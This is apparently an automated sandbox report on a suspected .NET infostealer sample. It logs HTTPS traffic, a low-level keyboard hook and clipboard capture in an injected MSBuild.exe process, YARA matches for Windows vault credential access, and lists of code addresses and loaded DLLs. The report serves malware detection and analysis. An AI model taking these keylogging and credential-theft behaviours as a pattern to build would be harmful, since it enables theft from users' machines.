                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49738 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, K6jmfEUYzg.cs.Net Code: aft6g33EiG
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                        System Summary

                        barindex
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.jYRIGnZlROed.exe.45cda10.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 9.2.jYRIGnZlROed.exe.4592df0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess Stats: CPU usage > 49%
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119B0BC NtQueryInformationProcess,0_2_0119B0BC
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517B0BC NtQueryInformationProcess,9_2_0517B0BC
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119C0900_2_0119C090
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01192BC00_2_01192BC0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119BAF00_2_0119BAF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011945180_2_01194518
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01196D080_2_01196D08
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011935B00_2_011935B0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011924400_2_01192440
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119B4A80_2_0119B4A8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01199F880_2_01199F88
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011949050_2_01194905
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011960000_2_01196000
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011930500_2_01193050
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011918500_2_01191850
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011978500_2_01197850
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011948570_2_01194857
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119784E0_2_0119784E
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011930600_2_01193060
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011918600_2_01191860
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011968900_2_01196890
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011968800_2_01196880
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01196B080_2_01196B08
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011923BC0_2_011923BC
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01192BB00_2_01192BB0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119A2180_2_0119A218
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119A2080_2_0119A208
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119A2F90_2_0119A2F9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01196AF80_2_01196AF8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011935A00_2_011935A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011924300_2_01192430
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011944C90_2_011944C9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01196CF90_2_01196CF9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01199F770_2_01199F77
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011947C80_2_011947C8
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_01195FF00_2_01195FF0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011966580_2_01196658
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011966520_2_01196652
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_011946A30_2_011946A3
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeCode function: 0_2_0119F6E80_2_0119F6E8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0120E38D8_2_0120E38D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01204A988_2_01204A98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01203E808_2_01203E80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_012041C88_2_012041C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0120A9608_2_0120A960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E65F08_2_065E65F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E55A88_2_065E55A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065EB2408_2_065EB240
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E30588_2_065E3058
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E7D988_2_065E7D98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E76A08_2_065E76A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E23408_2_065E2340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065EE3B08_2_065EE3B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E00408_2_065E0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E00068_2_065E0006
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E5CE78_2_065E5CE7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_065E053D8_2_065E053D
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016025E09_2_016025E0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01601C309_2_01601C30
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016014389_2_01601438
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016034F89_2_016034F8
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0160E4A89_2_0160E4A8
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016039849_2_01603984
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016008729_2_01600872
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016044209_2_01604420
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016044119_2_01604411
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0160141D9_2_0160141D
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016034D69_2_016034D6
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01605C929_2_01605C92
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016020999_2_01602099
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01604F289_2_01604F28
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01604F389_2_01604F38
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016057A09_2_016057A0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016057B09_2_016057B0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016052419_2_01605241
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01605A289_2_01605A28
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016056019_2_01605601
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_016056109_2_01605610
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_01605A199_2_01605A19
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051745189_2_05174518
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05176D089_2_05176D08
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051735B09_2_051735B0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051724409_2_05172440
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517B4A89_2_0517B4A8
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05179F889_2_05179F88
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517C0909_2_0517C090
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05172BC09_2_05172BC0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517BAF09_2_0517BAF0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051735A09_2_051735A0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051744169_2_05174416
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051744C99_2_051744C9
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05176CF99_2_05176CF9
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05179F779_2_05179F77
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05175FFF9_2_05175FFF
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051747E09_2_051747E0
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051766579_2_05176657
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051766589_2_05176658
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051746A39_2_051746A3
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517F6E89_2_0517F6E8
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051749059_2_05174905
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051760009_2_05176000
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051748579_2_05174857
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051778509_2_05177850
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517185F9_2_0517185F
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517305F9_2_0517305F
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517784C9_2_0517784C
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051718609_2_05171860
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051730609_2_05173060
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051768909_2_05176890
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051768809_2_05176880
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05176B089_2_05176B08
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_051723909_2_05172390
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05172BBF9_2_05172BBF
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517A2189_2_0517A218
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517A2089_2_0517A208
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_0517A2F99_2_0517A2F9
                        Source: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exeCode function: 9_2_05176AF89_2_05176AF8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0123E6A113_2_0123E6A1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_01234A9813_2_01234A98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_01233E8013_2_01233E80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_012341C813_2_012341C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0123A96013_2_0123A960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_067265F013_2_067265F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_067255A813_2_067255A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_06727D9813_2_06727D98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672B24013_2_0672B240
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672305813_2_06723058
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_067276A013_2_067276A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_06725CE713_2_06725CE7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672234013_2_06722340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672E3B013_2_0672E3B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672004013_2_06720040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672000713_2_06720007
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0672030813_2_06720308
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeStatic PE information: invalid certificate
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1665744842.0000000006600000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1662329813.00000000030BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1661873016.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000000.1614749380.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOZHI.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename1aa5ed53-faea-433c-bf5f-9e47e14be233.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeBinary or memory string: OriginalFilenameOZHI.exe4 vs SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
